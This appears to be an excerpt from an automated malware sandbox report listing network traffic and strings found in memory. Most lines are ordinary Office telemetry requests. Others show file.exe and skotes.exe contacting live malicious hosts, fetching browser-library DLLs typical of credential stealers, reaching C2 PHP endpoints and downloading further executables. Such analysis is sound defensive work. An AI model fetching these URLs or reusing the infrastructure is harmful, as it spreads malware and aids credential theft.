Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/7995533987/JoYUT4N.exe HTTP/1.1Host: 31.41.244.11

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4831Host: login.live.com

Source: file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2722572353.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2722572353.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2722572353.0000000000B82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2722572353.0000000000B82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllu
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll/
Source: file.exe, 00000000.00000002.2722572353.0000000000B82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2748285132.0000000023052000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2748285132.0000000023052000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllO
Source: file.exe, 00000000.00000002.2748285132.00000000230D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpI
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpM
Source: file.exe, 00000000.00000002.2748285132.00000000230D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpTE
Source: file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpW
Source: file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2720322383.00000000005EC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe1daae79862fa0ab8ea5ae274af5Extension
Source: file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpge
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy
Source: file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206ta
Source: skotes.exe, 00000017.00000002.3389127239.000000000128C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1012911001
Source: skotes.exe, 00000017.00000002.3389127239.000000000128C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
Source: skotes.exe, 00000017.00000002.3389127239.000000000128C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
Source: skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3389127239.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7995533987/JoYUT4N.exe
Source: skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7995533987/JoYUT4N.exeHFsp
Source: skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7995533987/JoYUT4N.exeXYZ0123456789
Source: skotes.exe, 00000017.00000002.3389127239.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7995533987/JoYUT4N.exeshqos.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, JoYUT4N[1].exe.23.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
